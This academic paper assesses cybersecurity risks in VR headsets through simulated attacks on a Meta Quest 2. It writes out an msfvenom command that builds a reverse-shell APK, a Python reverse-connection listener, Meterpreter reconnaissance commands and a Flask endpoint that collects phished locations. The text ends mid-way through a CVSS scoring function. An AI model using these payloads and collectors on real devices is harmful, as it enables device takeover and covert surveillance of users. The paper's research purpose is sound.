Article

A Cybersecurity Risk Assessment for Enhanced Security in Virtual Reality

by Rebecca Acheampong 1,*, Dorin-Mircea Popovici 1,2, Titus C. Balan 1, Alexandre Rekeraho 1 and Ionut-Alexandru Oprea 1

1 Faculty of Electrical Engineering and Computer Science, Transilvania University of Brasov, 500036 Brasov, Romania
2 Faculty of Mathematics and Computer Science, Ovidius University of Constanta, 900527 Constanta, Romania
* Author to whom correspondence should be addressed.
Information 2025, 16(6), 430; https://doi.org/10.3390/info16060430
Submission received: 10 March 2025 / Revised: 24 April 2025 / Accepted: 20 May 2025 / Published: 23 May 2025
(This article belongs to the Special Issue Extended Reality and Cybersecurity)

Abstract:
Our society is becoming increasingly dependent on technology, with immersive virtual worlds such as Extended Reality (XR) transforming how we connect and interact. XR technologies enhance communication and operational efficiency. They have been adopted in sectors such as manufacturing, education, and healthcare. However, the immersive and interconnected nature of XR introduces security risks that span from technical and human to psychological vulnerabilities. In this study, we examined security threats in XR environments through a scenario-driven risk assessment, using a hybrid approach combining Common Vulnerability Scoring System (CVSS) metrics and a custom likelihood model to quantify risks. This methodology provides a comprehensive risk evaluation method, identifying critical vulnerabilities such as Remote Code Execution (RCE), social engineering, excessive permission exploitation, unauthorized access, and data exfiltration. The findings reveal that human vulnerabilities, including users’ susceptibility to deception and excessive trust in familiar interfaces and system prompts, significantly increase attack success rates. Additionally, developer mode, once enabled, remains continuously active, and the lack of authentication requirements for installing applications from unknown sources, coupled with poor permission management on the part of the users, creates security gaps that attackers can exploit. Furthermore, permission management in XR devices is often broad and persistent and lacks real-time notifications, allowing malicious applications to exploit microphone, camera, and location access without the users knowing. By leveraging CVSS scores and a structured likelihood-based risk assessment, we quantified the severity of these threats, with RCE, social engineering, and insecure app installation emerging as the greatest risks. This study highlights the necessity of implementing granular permission controls, formalized developer mode restrictions, and structured user education programs to mitigate XR-specific threats.

1. Introduction

As society becomes increasingly reliant on technologies, it is simultaneously exposed to a broader range of cybersecurity threats [1]. Even the most secured network architectures can be compromised by human errors such as clicking on phishing emails, unintentional data leakage, and poor password practices [2], in turn putting information systems at risk. To counteract these risks, cybersecurity measures like firewalls, Intrusion Detection and Prevention Systems (IDPSs) [3], and secure software development lifecycles have been employed to protect data confidentiality, integrity, and availability [4]. However, as computing systems evolve and integrate complex hardware, new challenges emerge, particularly in XR environments, where social interactions extend beyond the real world [5].
The emergence of XR technologies builds on decades of research into human–computer interaction, virtual environments, and ubiquitous computing [6]. XR is used as a collective term for immersive technologies that merge the physical and digital worlds [7]. It includes Virtual Reality (VR), which offers fully simulated environments, and Augmented Reality (AR), which overlays digital content onto a user’s real-world surroundings [8]. These technologies have evolved from isolated, device-centric systems into highly interconnected platforms that integrate sensors, cloud computing, and real-time multi-user interaction [9]. As XR adoption extends beyond gaming and entertainment into critical sectors such as healthcare, education, and remote collaboration, its growth introduces unique cybersecurity risks [10].
XR systems, due to their unique architectures, interconnected components, and reliance on networked platforms, face increased cybersecurity risks [11]. They operate within complex ecosystems consisting of hardware, software, cloud services, and third-party applications [12]. While these interconnected systems enhance immersive experiences, they also expand the attack surface, making XR platforms attractive targets for cyber threats. A reliance on multiple synchronized components creates security blind spots such as unmonitored sensor data streams and delayed permission checks that adversaries can exploit to gain unauthorized access [13].
Hardware components such as camera and audio sensors, motion trackers, haptic feedback devices, ambient sensors, gyroscopes, accelerometers, and depth sensors play a critical role in real-time user interactions [3]. However, their extensive data collection capabilities also introduce privacy and security concerns. Compromised XR sensors can be leveraged for surveillance, unauthorized tracking, or data manipulation, threatening both user privacy and system integrity [14].
Real-world studies have highlighted the feasibility of XR-based cyberattacks. For instance, Shi et al. [15] demonstrated how attackers could exploit gyroscope and accelerometer data from VR headsets to reconstruct facial movements and eavesdrop on conversations, violating user privacy [16]. Moreover, adversaries can manipulate virtual objects, inject false positional data, or disrupt spatial mapping mechanisms to distort users’ perceptions within the virtual world [17]. Modifications of spatial boundaries can result in chaperone attacks, causing users to lose awareness of their physical space and potentially suffer physical injuries [10,14].
Casey et al. demonstrated how manipulating the spatial space in XR can teleport users without their knowledge [14], posing a potentially life-threatening risk that also endangers business operations [16]. While many recent cyber-attacks have exploited human vulnerabilities either through human error or psychological factors [18], the 2023 Imperva Bad Bot Report highlights a rise in security threats within the gaming industry, with many attacks exploiting immersive features such as real-time player interactions, virtual economies, and in-game assets. These systems, central to the immersive nature of online gaming, were abused by bots to automate gameplay, farm virtual currencies, or gain unfair competitive advantages [19,20].
Dastgerdy, S. [21] emphasized that the consequences of cybersecurity breaches in XR environments vary across different application domains. In high-risk scenarios, XR cyberattacks can result in severe consequences, including loss of life or a business collapse. For example, a denial-of-service (DoS) attack on an XR-based medical system could disrupt real-time surgical procedures, leading to patient harm [22]. The immersive nature of XR introduces distinct risks related to user perception and behavior. This environment creates opportunities for social engineering, psychological manipulation, and immersive deception, each of which generates critical concerns for XR security [23].
The intersection of technical gaps, user behavior, and real-world impacts emphasizes the importance of systematic evaluations of security threats in XR environments [24]. Various cybersecurity strategies such as penetration testing, vulnerability scanning, and risk assessment frameworks have been developed to mitigate security gaps [25]. Some of these methodologies are platform-specific, while others offer generalized security models that organizations can tailor to their unique XR system designs [26].
This study focuses specifically on standalone XR headsets and Android-based AR applications, assessing client-side attack vectors related to application installation, user permissions, and sensor access. Building on this scope, we introduce a scenario-driven cybersecurity risk assessment strategy utilizing a structured likelihood-based assessment model and Common Vulnerability Scoring System (CVSS) metrics to quantify XR-specific risks. Using a penetration-testing approach, this strategy can demonstrate real-world attack tactics such as reverse shell payloads, permission-based exploits, and phishing via XR platforms.
The aim of this research is to analyze and prioritize security threats in XR environments by simulating real-world attack scenarios and quantifying risks through a hybrid scoring approach. Some of the key contributions of this research are given below:
  • We designed a practical, scenario-driven methodology for evaluating cybersecurity risks in XR systems using penetration tactics.
  • We introduced a structured likelihood-based model incorporating user behavior, system exposure, vulnerability exploitability, and attack popularity factors.
  • We quantified security risks using a hybrid approach combining CVSS and a custom likelihood model.
  • We conducted an analysis of XR platform design (e.g., developer mode and permission handling) and how these elements introduce exploitable security gaps.
While traditional security frameworks or attack-modeling techniques have been applied to XR in prior research [27], few studies have adopted a scenario-driven, exploit-based methodology rooted in real-world tools and threat simulations. Moreover, the integration of structured likelihood modeling tailored to human behavior and XR-specific permission systems remains underexplored. In this study, we addressed this gap by simulating XR-specific threats using common adversarial tools and evaluating risk with a hybrid scoring approach.
The rest of our study is organized as follows: Section 2 explores XR security challenges, while Section 3 presents a review of related studies. Section 4 introduces real-world attack scenarios. Section 5 details the risk assessment methodology and is followed by Section 6, which discusses findings. Section 7 presents recommendations, and Section 8 concludes the study.

2. Cybersecurity Challenges in XR

Examining the security risks present in XR environments exposes a complex landscape where traditional cybersecurity concerns mix with novel challenges specific to immersive technologies [13]. XR systems present a broader attack surface due to their reliance on sensor-rich environments, real-time data processing, and interconnected hardware and software components. These elements introduce new security concerns that extend beyond conventional IT infrastructure, demanding specialized risk mitigation strategies.
One of the most critical concerns in XR environments is data privacy [28]. Unlike traditional digital platforms, XR systems collect, process, and store a vast range of sensitive user data, including behavioral patterns, biometric data, and spatial mapping information [17,29].
To deliver immersive experiences, XR devices rely on a variety of sensors, such as gyroscopes, accelerometers, cameras, depth sensors, and biometric scanners [15]. However, these same sensors introduce privacy vulnerabilities, making sensor spoofing, data manipulation, and unauthorized access possible. Attackers may exploit sensor data to infer sensitive user details, engage in motion-tracking surveillance, or even manipulate sensor outputs to distort virtual experiences [30]. Similarly, users’ movements can be controlled by the attacker, leading them to a specified physical location without their awareness [10].
Unauthorized access, which includes a variety of methods by which malicious actors may compromise user accounts and devices, exploit unsafe network connections to intercept credentials, and take advantage of software or hardware vulnerabilities in XR platforms, represents another critical risk in XR environments [20,31]. The gaming industry, an early adopter of XR technologies, faces severe unauthorized access threats. According to the Akamai 2022 report [32], attackers frequently target gamers’ accounts to steal in-game assets, currencies, and profile information, which are later sold on the dark web.
In XR environments, the boundary between physical and virtual spaces is blurred, leading to unique safety challenges. Attackers may manipulate virtual objects, alter spatial setups, or inject malicious content to disrupt user experiences [14,15].
For instance, Local File Inclusion (LFI) attacks have been used in XR applications to exploit running scripts, access player data, and gain unfair advantages in gaming environments [32]. Such manipulations not only compromise fair gameplay but also pose physical safety risks, as users rely on virtual objects for navigation and interaction. Similarly, modifications of spatial boundaries can result in chaperone attacks, causing users to lose track of their physical surroundings [14]. In situations like AR navigation, virtual overlay attacks can occur, which could lead users astray or even cause an accident [33]. All these issues pose both security and safety risks.
XR applications heavily depend on network connectivity to synchronize data across devices, servers, and cloud platforms. However, poorly secured communication channels expose users to data interception and eavesdropping on sensitive information; man-in-the-middle (MITM) attacks, which alter transmitted data; and denial-of-service (DoS) attacks, which can disrupt XR applications through targeted overloads [34].
If network security is compromised, XR users may experience session hijacking, unauthorized surveillance, or loss of control over virtual environments.
The immersive nature of XR environments introduces new vectors for psychological manipulation and social-engineering attacks. Deep immersion causes users to lose track of their self-awareness [35]. Adversaries can exploit immersion by impersonating trusted entities in virtual spaces, using deceptive avatars or environments to manipulate user behavior or extract sensitive information through interactive deception techniques [36].
The Imperva Bad Bot Report 2023 [19] and studies by Sead Fadilpašić [31,32] document numerous security threats affecting the gaming industry, emphasizing how XR spaces are vulnerable to sophisticated forms of social engineering.
Malware remains one of the most dangerous threats in XR environments. Attackers exploit malicious APKs, spyware, and trojans to gain unauthorized access to XR devices, manipulate virtual environments, or steal sensitive data [12]. The high level of interconnectivity in XR platforms, particularly through social media and cloud-based services, enables malware to spread rapidly, affecting a large number of devices with minimal effort. This widespread distribution can have far-reaching security implications, ranging from privacy violations to full device compromise.
Researchers such as Vondracek et al. [37] have assessed the severity of malware-based attacks in XR environments. They simulated a Man-in-the-Room (MITR) attack, showcasing how malicious code can manipulate virtual spaces, compromise user sessions, and alter perceived reality within immersive environments.
Malware delivery in XR environments often relies on social-engineering techniques and deceptive links to trick users into downloading infected applications. Additionally, spyware and trojans embedded in third-party app stores or sideloaded VR applications represent a significant attack vector. Once introduced into an XR system, malware can lead to severe consequences, including privacy violations, device hijacking, and disrupted virtual experiences.
While data privacy, sensor hijacking, and malware are threats common to many internet-enabled systems, XR introduces unique vulnerabilities due to its immersive nature and fusion of physical and virtual contexts. Unlike smartphones or IoT devices, XR systems rely on continuous spatial tracking, environmental mapping, and gesture recognition, creating a persistent, real-time feedback loop between user behavior and system responses [38]. This makes the consequences of an exploit not only digital but also physical, including disorientation, virtual object tampering, and unsafe locomotion [14]. The blurred boundary between physical and virtual space in XR can be exploited to manipulate perception, influence decision-making [13], and even induce physical harm, risks that do not typically apply when using non-XR systems.
Table 1 illustrates the applicability of common internet-based attacks and highlights their distinct exploitation pathways in XR systems.

Platform-Level Security and Privacy Limitations in XR Ecosystems

XR platforms such as Meta Quest 2 (Oculus) operate on modified Android-based systems [9] and include several security mechanisms designed to control access to sensitive data streams like cameras, microphones, and location [39]. These include app sandboxing, permission prompts, and by-default restrictions on sideloading apps from unknown sources.
However, the effectiveness of these control measures is limited by user behavior and developer features. For instance, in order to sideload applications, users must manually enable Developer Mode, a feature intended for testing but often required to install apps outside the official store. This action removes many of the default restrictions, enabling the installation of unsigned or unvetted APKs.
Once sideloading is allowed, permission prompts vary by application behavior. In many cases, apps request access to sensitive sensors (camera, mic, and location) only once, during installation or first use. These prompts are often vague and lack context or justification, making users more likely to grant access without scrutiny, especially in immersive environments, where prompts may be integrated into the virtual interface itself [14].
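As an illustration of how broad these up-front permission requests can be, the following minimal sketch audits the sensor-related permissions declared in a sideloaded APK before installation. It assumes the androguard Python package (the import path matches androguard 3.x and may differ in newer releases), and the APK file name is hypothetical.

```python
# Requires the androguard package (pip install androguard); the import path
# below follows androguard 3.x and may differ in newer releases (assumption).
from androguard.core.bytecodes.apk import APK

# Sensor-related permissions repeatedly highlighted in this study.
SENSITIVE = {
    "android.permission.CAMERA",
    "android.permission.RECORD_AUDIO",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.ACCESS_COARSE_LOCATION",
}


def audit_apk(path: str) -> None:
    """Print the sensitive permissions a sideloaded APK declares up front."""
    requested = set(APK(path).get_permissions())
    for permission in sorted(requested & SENSITIVE):
        print(f"[!] {path} requests {permission}")


audit_apk("suspicious_app.apk")  # hypothetical sideloaded package
```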
The Oculus Store does offer an app review process, but many users also access apps via SideQuest, a third-party platform that functions more like a “Wild West” environment. Apps on SideQuest are not subject to the same vetting and can be installed freely once Developer Mode is active.
These findings highlight how the XR ecosystem’s current security paradigm, especially around permissions, sensor access, and app distribution, creates conditions suitable for exploitation by attackers.

3. Related Studies

Only a few researchers have explored risk assessment in AR and VR environments, each proposing different frameworks for evaluating security, privacy, and safety risks. The standard methods used to analyze and address security issues in systems include layered design, vulnerability detection, penetration testing, and proof of correctness [12]. In addition, automated and dynamic security tools provide a quick security assessment to expose hidden vulnerabilities, enhancing the efficiency of security evaluations [40].
Guo et al. [9] conducted a study in which the VR-SP assessment tool was used to evaluate the security of VR applications. They collected 500 apps from the SideQuest and Oculus Stores, extracted their APK files, and decompiled them to analyze the program structures. This approach allowed them to perform a comprehensive security assessment of both the platform and operating system. Their findings revealed inherent security flaws in the hash functions and encryption algorithms used within these applications.
Although this work offers a robust analysis of XR app-level vulnerabilities, it primarily focuses on static code analysis and lacks information gathered using a broader threat-modeling approach or exploit simulation that ties vulnerabilities to specific user or attacker behaviors.
Reconnaissance is a critical phase in the cyber kill chain. Dastgerdy structured their study around this phase, gathering information, analyzing vulnerabilities, and categorizing security risks into three key areas: physical devices, applications, and development platforms. Their findings highlighted common threats, including cross-site scripting, eavesdropping, and remote code execution [21].
While their study provides a useful classification of XR threats, it remains descriptive and static, emphasizing the relevance of the reconnaissance and vulnerability identification phases in ethical hacking. Additionally, it lacks a structured methodology for quantifying or prioritizing risks, and the author did not employ practical attack simulations or scoring mechanisms.
Robyn R. Lutz performed a safety risk analysis on an AR app for automotive use, specifically the AR Left-Turn Assist [41]. The study introduced a human-centric risk analysis focused on situational awareness, categorizing risks under perception, comprehension, and decision-making. Using Bi-Directional Safety Analysis, the author identified four failure modes: absent/missing output, incorrect output, wrong output, and excessive output. It was found that missing overlays could lead to fatal accidents due to a lack of situational awareness, while incorrect or delayed overlays could result in poor decision-making [42].
Although this study offers valuable insights into safety-critical AR systems, its primary focus is on safety and human–machine interaction rather than cybersecurity threats. Furthermore, its application domain is restricted to automotive use cases, limiting its generalizability to broader XR environments.
The authors of another study applied attack trees [43] to assess risks in vSocial, a Virtual Reality Learning Environment [44]. The researchers aimed to characterize threats to security, privacy, and safety, prioritizing them using risk assessment metrics. The attack model targeted the vSocial server on the Steam platform, with threats including malicious network discrepancies, packet sniffing, and denial-of-service (DoS) attacks. By simulating attacks and analyzing network packets using Wireshark and Clumsy, the researchers measured user experience impacts and assigned risk values based on probability, attack cost, and data loss [27].
While this approach successfully demonstrated a structured risk prioritization method, it remains largely conceptual and focused on network-layer vulnerabilities. Moreover, the cited study lacked a quantitative vulnerability scoring system and did not integrate real-world exploitation.
Silva et al. conducted a survey to identify cybersecurity attacks targeting VR and AR. They then performed a risk assessment of these threats by evaluating both their probability and impact, grouping the risks into specific domains. Their findings indicate that the education and healthcare sectors are the most vulnerable [10].
However, their approach was based on collected perception data rather than technical simulations, and the risk-scoring approach employed was qualitative, with no integration of standardized models such as CVSS or structured likelihood metrics.
In the reviewed studies, the following limitations were identified:
  • The primary focus was safety, general risk awareness, or categorization rather than technical system-level cybersecurity threats.
  • The authors used theoretical models without simulating real-world exploits or making practical demonstrations.
  • The authors employed domain-specific XR systems or relied on survey-based perceptions, limiting technical depth and generalizability.
  • No standardized vulnerability-scoring frameworks like CVSS were used to assess and prioritize risk severity.
In Table 2, a comparison of the literature with the current study is presented. This study enhances XR security research through practical, scenario-driven risk assessments, exploiting inherent vulnerabilities to address novel cybersecurity threats that prior research has not considered.

4. Case Studies and Threat Model

4.1. Threat Model

In this study, we modeled an attacker targeting XR environments through user-level and network-level attack vectors. Before presenting the specific attack simulations and methodological procedures, we define the threat model that underpins this study. This model describes the assumed capabilities, objectives, and constraints of the attacker in the context of XR environments. The attacker is assumed to have the following capabilities.
  • Attacker Capabilities
The attacker is assumed to possess access to publicly available penetration-testing tools such as MSFvenom [45], Metasploit [46], Storm Breaker [47], and Ngrok [48]. They are skilled in social-engineering techniques and capable of hosting malicious payloads and phishing pages on remote servers. We do not assume the attacker has physical access to the XR device; the attacks are assumed to be conducted entirely remotely.
  • Initial Access
It is assumed that the victim can be lured into clicking malicious links via XR browsers (e.g., Oculus Browser) and installing unauthorized APK files, and that the victim has developer mode enabled either by default or due to prior use. This enables the execution of reverse shell payloads and the exfiltration of sensitive data.
  • Objectives
The primary goal is to gain persistent access to the XR device, exfiltrate personal data (e.g., audio recordings, location, etc.), interact with system services, and maintain undetected control. This may include manipulating device behavior or disabling system boundaries such as spatial limits and guardian systems.
  • Assumptions
It is assumed that the device allows APK sideloading, is connected to the internet, and lacks security mechanisms such as advanced intrusion detection tools actively monitoring threats. It is also assumed that the user will grant microphone, location, and camera permissions when prompted.
  • Success Metrics
An attack is considered successful if the adversary is able to establish a reverse shell connection with the XR device, execute arbitrary commands remotely, and access system files, sensors, or services without being detected. Furthermore, the attacker must be capable of exfiltrating data—such as audio recordings, location information, or system logs—in a manner consistent with known real-world malware behaviors.

4.2. Experimental Setup and Methodology

We focused on developing and analyzing attack scenarios to identify threats and vulnerabilities affecting immersive technologies and to inform a risk assessment framework. This section describes the technical steps, tools, and experimental setups used to simulate and assess the attack scenarios, as well as the process of deriving a cybersecurity framework based on the findings. We employed a custom approach in which we simulated threat actions, that is, plausible attacks within the immersive ecosystem, to identify vulnerabilities and evaluate their implications, thereby informing the risk assessment.
Figure 1 and Figure 2 describe the attack workflow of the scenarios, while the details of the process are described in Section 4.3.
The tools employed in this study include widely adopted penetration testing platforms and social-engineering toolkits, chosen for their alignment with real-world behaviors exhibited in attacks targeting XR devices.
The Metasploit Framework was used as the primary exploitation platform due to its modular architecture, which supports auxiliary scanning, exploit execution, payload delivery, and post-exploitation tasks [46]. As a standard penetration-testing platform, it is widely known for supporting multiple operating systems, including Windows, Kali Linux, and Android [25]. Payloads were created using MSFvenom, a Metasploit component that combines Msfpayload and Msfencode into a single framework, allowing for the development of various customized payloads, including backdoors, trojans, and shellcode for different operating systems [49].
The Apache2 Web Server was deployed as the payload host, serving as a legitimate content delivery point from which the malicious APK could be downloaded for social-engineering attacks. For scenarios involving sensor-level surveillance and reconnaissance, Storm Breaker was used. This social-engineering toolkit facilitates remote access to a victim’s microphone, camera, and location data through deceptive web interfaces. It comes with a web panel that remotely tracks victims’ responses in real-time and captures extracted data for analysis [47].
The chosen tools (MSFvenom and Storm Breaker) reflect techniques frequently documented as being used in real-world mobile security threats, such as the use of Android malware kits and phishing payload delivery via Ngrok. They were selected for this study because of their ability to simulate behaviors documented in public threat intelligence databases, allowing replicable exploitation of known XR vulnerabilities. The scenarios developed in this study simulate vulnerabilities commonly exploited in mobile and XR-based environments, ensuring realism and applicability.
While the Meterpreter payload has previously been used in XR-related security research [14], tools such as MSFvenom and Storm Breaker have not been explicitly applied within XR contexts. This study extends the use of these tools by adapting their traditional roles in Android exploitation to immersive scenarios involving XR browsers, user interaction, and permission-based abuse. In doing so, it reveals new exploit paths and attack surfaces specific to XR platforms that have not been systematically explored in prior work.
In the setup of this experiment, we used publicly available penetration-testing tools to simulate client-side attack vectors on XR platforms. For Scenario 1, MSFvenom was used to craft a reverse TCP payload (android/meterpreter/reverse_tcp) with the parameters (LHOST = 192.168.1.2, LPORT = 4444), embedded in a malicious APK and hosted on Apache2. The Metasploit multi-handler was configured to receive the reverse shell connection. Testing was performed on a Meta Quest 2 headset running Android 11, with developer mode enabled and installation from unknown sources allowed.
For Scenario 2, Storm Breaker, a social-engineering toolkit, was used to generate malicious phishing links that requested access to the target’s microphone, camera, and location data through deceptive prompts. Ngrok was configured to provide an external tunnel to the local listener interface, enabling access across networks. The phishing page was opened via the Oculus browser, and, when permission was granted, the toolkit collected data and sent them to the attacker-controlled panel. This setup reflects real-world tactics involving deceptive social features within XR platforms and highlights the risks of permission abuse without persistent indicators.

4.3. Threat Scenarios

To address contribution 1, two practical attack scenarios were developed, targeting XR devices and AR applications to simulate real-world exploitation paths. These scenarios demonstrate how attackers can exploit XR environments using social engineering, remote access tools, and permission-based exploits.
1. Scenario 1: Remote Command Execution on Oculus Quest 2 via Malicious APK
In the first scenario, we tested the feasibility of delivering a malicious APK file to an Oculus Quest 2 device (Meta Platforms, Inc., Menlo Park, CA, USA) using MSFvenom. The payload, with a size of 10,235 bytes, was hosted on an Apache2 web server and delivered through the Oculus browser. As shown in Figure 3, the MSFvenom utility was used to generate a malicious APK containing a reverse TCP payload: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=4444 R > atak.apk. This output confirms that the payload was successfully created for further use in the attack simulation targeting XR devices.
Under normal circumstances, an attacker would employ social-engineering techniques to persuade a user to click on a malicious link, or they would embed an APK file within an image or advertisement. Once the user clicks the link, the APK file is downloaded and installed on the VR device.
After the malicious application was successfully installed, a reverse TCP connection was established, allowing the malicious user to execute remote commands on the device. Using Metasploit’s multi-handler exploit, a listener was opened to intercept and control the compromised device. As illustrated in Figure 4, the Metasploit multi-handler successfully opened a Meterpreter session with the target XR device after the payload was executed. The sysinfo command confirms full remote access to system-level data, including OS version, architecture, and language settings, demonstrating the feasibility of real-world remote exploitation. This connection enabled the execution of shell commands allowing full access to the VR system.
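To make the reverse-connection mechanism concrete, the minimal sketch below shows a raw-socket listener that waits for a compromised device to connect back and then issues a single command. It is a conceptual stand-in rather than the Metasploit multi-handler or the Meterpreter protocol used in the experiment, and the bind address, port, and command are placeholders.

```python
import socket

# Placeholder listener endpoint; the experiment used the multi-handler on LPORT 4444.
LHOST, LPORT = "0.0.0.0", 4444

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as listener:
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((LHOST, LPORT))
    listener.listen(1)
    print(f"[*] Waiting for a reverse connection on {LHOST}:{LPORT} ...")
    conn, addr = listener.accept()   # the payload on the device initiates the connection
    with conn:
        print(f"[+] Connection from {addr}")
        conn.sendall(b"id\n")        # works against a plain shell; Meterpreter uses its own protocol
        print(conn.recv(4096).decode(errors="replace"))
```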
Once the connection was established, the following Meterpreter-specific commands were executed to gather device information that could be used to escalate privileges:
  • sysinfo—retrieves system information;
  • app_list—lists installed applications on the VR device;
  • getuid—displays the user ID under which the exploit is running;
  • shell commands—allow interaction with the device’s file system and processes, executing commands such as ls (list directory contents), pwd (print working directory), ps (list running processes), and cat <file> (read the contents of a file).
As shown in Figure 5, the attacker was able to retrieve a full inventory of installed applications and system services. This reconnaissance step enables adversaries to identify high-value services for exploitation, such as those managing user authentication (com.meta.AccountsCenter) or spatial boundary enforcement (com.oculus.guardian). Disabling or modifying these services may result in persistent access, the ability to bypass authentication, or even physical safety risks in immersive environments.
2. Scenario 2: Eavesdropping and Surveillance via Oculus Quest 2
The second scenario focuses on eavesdropping and unauthorized surveillance, exploiting user permissions in Oculus Quest 2 and AR applications on Android devices. This attack highlights the risks associated with misconfigured permissions and social-engineering tactics.
We used Storm Breaker, a social-engineering and reconnaissance toolkit available on Kali Linux, to create a malicious phishing link [25]. Ngrok was used for port forwarding, allowing external connections to access the attacker’s local listening server. Figure 6 demonstrates the Storm Breaker server with an Ngrok port-forwarding number.
Figure 7 displays the Ngrok-generated URLs produced by Storm Breaker for each social-engineering template, including access to the microphone, camera, location, and system information. Each URL corresponds to a deceptive feature designed to lure the user into granting access to sensitive sensors under the guise of XR functionality.
Once the target clicked the malicious link, they unknowingly granted the attacker access to their device’s microphone, camera, and location data.
Attack Components and Execution Details:
1. Location-Tracking Attack
A phishing link, disguised as a social feature prompting users to find nearby friends on their VR device, is illustrated in Figure 8. When the link was opened in the Oculus browser, it extracted device information and geolocation data. The precise coordinates of the victim were sent to the attacker’s listening server, formatted as follows: https://google.com/maps/place/45.6556533+25.5802166 (accessed on 5 February 2025).
At this point, the attacker was tracking the victim’s location in real time, enabling stalking, unauthorized surveillance, or even physical threats. The information sent to the Oculus Quest 2 device is shown in Figure 9; a conceptual sketch of the attacker-side collection endpoint is provided after this list.
2. Microphone-Hijacking Attack
A phishing link that requested microphone access under the pretense of enabling a VR voice feature was sent to the target. The victim granted the microphone permission, unknowingly allowing the attacker to record their conversations. The recorded audio was then automatically transmitted to the attacker’s listening server, as shown in Figure 10. Conversations continued to be recorded and transmitted until the user manually closed the browser, often without becoming aware of the ongoing surveillance.
3. Camera Hijacking via AR Applications
A malicious link was sent to the target, and, upon clicking the link, the user unknowingly granted camera access, allowing the attacker to remotely capture images or video. Since the camera continued running in the background, the victim was unaware of the attack. The attacker collected the video feed and images through the Storm Breaker admin panel, as shown in Figure 11.
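To illustrate the attacker-side collection step referenced in the location-tracking attack above, the following is a minimal sketch of a listener that receives posted coordinates and formats them as a maps link, mirroring the output format reported earlier. It is a conceptual stand-in for Storm Breaker’s admin panel, and the Flask route, field names, and port are hypothetical.

```python
from flask import Flask, request

app = Flask(__name__)


@app.route("/location", methods=["POST"])  # hypothetical endpoint the phishing page posts to
def collect_location():
    # The deceptive page forwards the coordinates returned by the browser's
    # geolocation API once the victim grants the permission prompt.
    lat = request.form.get("lat")
    lon = request.form.get("lon")
    print(f"[+] Victim location: https://google.com/maps/place/{lat}+{lon}")
    return "", 204


if __name__ == "__main__":
    # In the experiment, an Ngrok tunnel exposed the local listener so that
    # devices outside the local network could reach it.
    app.run(host="0.0.0.0", port=8080)
```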

5. Risk Assessment Methodology

We employed a systematic approach integrating multiple methodologies to conduct a comprehensive risk assessment of the two scenarios. It began with an analysis of each scenario to identify inherent threats, exploited vulnerabilities, and the impact on confidentiality, integrity, and availability—the CIA triad [50].
To enhance accuracy, we incorporated established models such as the NVD CVSS calculator [51] and reference standards such as those from NIST [52]. Additionally, we developed a custom model to calculate the likelihood of each identified threat occurring and computed the risk scores.

5.1. Threats Identified in the Scenarios

1. Scenario 1 highlights the following threats:
  • Remote Code Execution—The attacker gained remote access to the Oculus Quest 2 and could execute shell commands via Metasploit. The exploited vulnerability was “Malicious APK execution enables arbitrary code execution”. The vulnerability string was as follows: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H.
  • Social engineering via phishing—The attacker relied on social engineering, tricking the user into clicking a malicious link or sideloading an APK. The exploited vulnerability was “lack of user awareness”. The vulnerability string was as follows: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L.
  • Insecure app installation—The user was tricked into granting developer permissions to install an application from an unknown source. The exploited vulnerability was “excessive permission abuse”. The vulnerability string was as follows: AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L.
  • Unauthorized access and data exfiltration—The attacker gained unauthorized access and used Meterpreter commands (cat <file>, ls, pwd, ps) to steal files and system data from the compromised XR device. The exploited vulnerability was “Exposure of sensitive information (files, messages, contacts)”. The vulnerability string was as follows: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N.
2. Scenario 2 highlights the following threats:
  • Eavesdropping via microphone—The phishing attack tricked the user into granting microphone permissions. The exploited vulnerability was “weak microphone permission control”. The vulnerability string was as follows: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N.
  • Social engineering via phishing—Storm Breaker delivered deceptive links disguised as XR features. The exploited vulnerability was “lack of awareness”. The vulnerability string was as follows: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L.
  • Surveillance via camera—An XR browser exploit granted the attacker access to live video feeds. The exploited vulnerability was “no persistent camera indicator”. The vulnerability string was as follows: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N.
  • Real-time location tracking—The attacker extracted precise GPS coordinates through deceptive permission prompts. The exploited vulnerability was “lack of strict location access rules”. The vulnerability string was as follows: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N.

5.2. Risk Analysis

Risk represents the potential loss arising from three key variables: the likelihood of an attack, the vulnerability that the attack exploits, and the possible cost incurred if the attack succeeds [53]. When vulnerabilities are exploited, they compromise one or more of the components of the CIA triad. The primary goal of risk analysis is to assess both the impact of potential threats and the effectiveness of each attack path [54].
Risk can be estimated using the formula
Risk = Threat × Vulnerability × Impact,
so it is important to define and quantify the factors that determine the likelihood, vulnerability, and impact values. In our risk assessment, we integrate the Common Vulnerability Scoring System (CVSS) to quantify the severity and potential impact of each vulnerability. CVSS scores range from 0.0 to 10.0 and enable organizations to evaluate and prioritize vulnerabilities based on their potential impact. These scores are derived using key metrics from the National Vulnerability Database (NVD)’s CVSS calculator, which assesses exploitability and impact [51]. When computing the vulnerability score, the CVSS calculator also generates the associated impact score, as illustrated in Figure 12.
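For transparency, the reported scores can be cross-checked against the CVSS v3.1 base-score equations published by FIRST.org; the sketch below re-implements them for the vector strings listed in Section 5.1. The study itself relied on the NVD calculator, so this code is an independent verification aid rather than the tool that was employed.

```python
import math

# CVSS v3.1 base-metric weights from the FIRST.org specification.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.20}
AC = {"L": 0.77, "H": 0.44}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.50}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value: float) -> float:
    """CVSS v3.1 Roundup: smallest number with one decimal place >= value."""
    scaled = int(round(value * 100000))
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def cvss_base_score(vector: str) -> float:
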